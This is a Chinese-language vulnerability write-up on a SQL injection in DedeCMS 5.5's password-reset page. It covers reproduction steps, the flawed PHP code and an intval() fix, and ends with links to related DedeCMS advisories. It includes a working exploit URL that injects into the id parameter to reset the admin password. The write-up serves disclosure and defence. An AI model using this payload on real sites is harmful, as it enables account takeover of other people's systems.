catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

DEDEcms SQL注入漏洞导致可以修改任意用户密码

2. 漏洞触发条件

. 注册一个用户

. 找回密码,选择通过安全问题取回: http://localhost/dedecms5.5/member/resetpassword.php

. 填写完毕信息之后点击确认

. 然后点击确认,会跳转到这样一个URL上: http://localhost/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=2&key=zPnruOY7

//黑客就可以构造EXP如下

http://127.0.0.1/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=xx' or userid='admin' and '2&key=zPnruOY7&setp=2&pwd=111222&pwdok=111222

//把上面url中的2改成之前跳转到链接的id参数,然后把key也改成之前跳转的链接的key参数

//然后userid可以修改成你需要修改密码的用户: admin

//pwd和pwdok就是需要修改成的密码必须保持一样: md5(111222)=00b7691d86d96aebd21dd9e138f90840

aaarticlea/png;base64,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" alt="" />

修改成功

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2010-042167

3. 漏洞影响范围
4. 漏洞代码分析

/member/resetpassword.php

..

elseif($dopost == "getpasswd")

{

    //修改密码

    if(empty($id))

    {

        ShowMsg("对不起,请不要非法提交","login.php");

        exit();

    }

    //只匹配出了所有的数字

    $mid = ereg_replace("[^0-9]","",$id);

    $row = $db->GetOne("Select * From #@__pwd_tmp where mid = '$mid'");

    if(empty($row))

    {

        ShowMsg("对不起,请不要非法提交","login.php");

        exit();

    }

    if(empty($setp))

    {

        $tptim= (***);

        $dtime = time();

        if($dtime - $tptim > $row['mailtime'])

        {

            $db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';");

            ShowMsg("对不起,临时密码修改期限已过期","login.php");

            exit();

        }

        require_once(dirname(__FILE__)."/templets/resetpassword2.htm");

    }

    //攻击poc进入这个流支

    elseif($setp == )

    {

        if(isset($key))

        {

            $pwdtmp = $key;

        }

        $sn = md5(trim($pwdtmp));

        if($row['pwd'] == $sn)

        {

            if($pwd != "")

            {

                if($pwd == $pwdok)

                {

                    $pwdok = md5($pwdok);

                    $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';";

                    $db->executenonequery($sql);

                    //$id没有经过任何过滤就带入了SQL查询,导致了update注入

                    $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';";

                    if($db->executenonequery($sql))

                    ..

5. 防御方法

/member/resetpassword.php

/* 对$id变量进行规范化 */

$id = isset($id)? intval($id) : ;

/* */

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

dedecms /member/resetpassword.php SQL Injection Vul的更多相关文章

  1. dedecms /member/flink_main.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 会员模块中存在的SQL注入 Relevant Link http://w ...

  2. dedecms /member/uploads_edit.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms 5.3版本下的member/uploads_edit.p ...

  3. dedecms /member/reg_new.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 2. 漏洞触发条件 http://127 ...

  4. dedecms /member/pm.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  5. dedecms /member/myfriend_group.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  6. dedecms /member/mtypes.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  7. dedecms /member/edit_baseinfo.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 会员模块中存在的SQL注入 Relevant Link: http:// ...

  8. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

  9. dedecms /plus/feedback.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . Dedecms v5.7的plus\feedback.php SQL ...

随机推荐

  1. 单页面网站关于id冲突的解决办法

    最近做了一个单页面的网站,所有的页面加载都是通过局部刷新的方式,并且不用iframe,并且我们引入了动态tab页签: 所有的页签里的内容都只是一个元素,都在同一个html页面上,没有任何iframe分 ...

  2. Oracle中使用Entity Framework 6.x Code-First方式开发

    去年写过一篇EF的简单学习笔记,当时EF还不支持Oracle的Code-First开发模式,今天无意又看了下Oracle官网,发现EF6.X已经支持了,并且给出了二篇教程(英文版): 1.Using ...

  3. oracle 分组排序函数

    项目开发中,我们有时会碰到需要分组排序来解决问题的情况:1.要求取出按field1分组后,并在每组中按照field2排序:2.亦或更加要求取出1中已经分组排序好的前多少行的数据 这里通过一张表的示例和 ...

  4. Oracle On 、Where、Having 区别

    ON .WHERE.HAVING都能通过限制条件筛选数据,但他们的使用及其不同.下面我们来分析三者之间的区别. 1. ON 和WHERE 所有的查询都回产生一个中间临时报表,查询结果就是从返回临时报表 ...

  5. 为什么我们的web前端变的越来越复杂

    前端发展了也有些年头了,曾记得很多年前,聊起前端,都觉得是很简单,那个时候都没有前端工程师这个职位.可现在,前端已经逆袭了,已经不是原来的样子了,各种技术层出不穷,显的越来越高深莫测了.前端真的变得那 ...

  6. C++ redirect input

    #include<iostream> #include<string> #include<fstream> using namespace std; int mai ...

  7. [AJAX系列]XMLHttpResponse对象

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  8. Linux下安装libiconv使php支持iconv函数

    libiconv组件安装好了可以让我们php支持iconv函数了,这个函数的作用就是字符编码强制转换了,下面和111cn小编一起来看一个Linux中安装libiconv使php支持iconv函数的例子 ...

  9. C++ new失败的处理

    我们都知道,使用 malloc/calloc 等分配内存的函数时,一定要检查其返回值是否为“空指针”(亦即检查分配内存的操作是否成功),这是良好的编程习惯,也是编写可靠程序所必需的.但是,如果你简单地 ...

  10. HTML5+AJAX原生分块上传文件的关键参数设置

    processData:false 这是jquery.ajax的一个参数.默认值为true,表示会将非字符串对象自动变成k1=v1&k2=v2的形式,例如一个数组参数{d:[1,2]},到服务 ...